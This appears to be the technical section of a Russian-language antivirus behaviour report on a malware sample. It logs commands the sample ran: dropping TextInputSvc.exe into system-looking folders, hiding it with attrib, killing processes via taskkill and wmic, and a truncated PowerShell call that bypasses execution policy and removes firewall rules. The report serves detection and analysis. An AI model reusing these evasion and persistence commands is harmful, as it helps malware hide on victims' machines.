Техническая информация
- '<SYSTEM32>\taskkill.exe' /F /IM TextInputSvc.exe /T
- Процесс ddpdcs.exe, модуль Amsi.dll
- Процесс ddpdcs.exe, модуль ntdll.dll
- nul
- %ALLUSERSPROFILE%\microsoft\textservicesframework\textinputsvc.exe
- %LOCALAPPDATA%\microsoft\windows\caches\textinputsvc.exe
- %ALLUSERSPROFILE%\microsoft\textservicesframework\textinputsvc.exe
- %LOCALAPPDATA%\microsoft\windows\caches\textinputsvc.exe
- ClassName: '' WindowName: ''
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command " # ========== УДАЛЯЕМ СТАРЫЕ ПРАВИЛА ========== Remove-NetFirewallRule -DisplayName \"TextInputSvc*\" -ErrorAction SilentlyContinue # ========== OU...
- '<SYSTEM32>\cmd.exe' /C "taskkill /F /IM TextInputSvc.exe /T 2>nul"
- '<SYSTEM32>\cmd.exe' /C "wmic process where \"ExecutablePath='C:\\ProgramData\\Microsoft\\TextServicesFramework\\TextInputSvc.exe'\" delete 2>nul"
- '<SYSTEM32>\wbem\wmic.exe' process where \"ExecutablePath='C:\\ProgramData\\Microsoft\\TextServicesFramework\\TextInputSvc.exe'\" delete
- '<SYSTEM32>\attrib.exe' +S +H %ALLUSERSPROFILE%\Microsoft\TextServicesFramework\TextInputSvc.exe
- '<SYSTEM32>\attrib.exe' +S +H %LOCALAPPDATA%\Microsoft\Windows\Caches\TextInputSvc.exe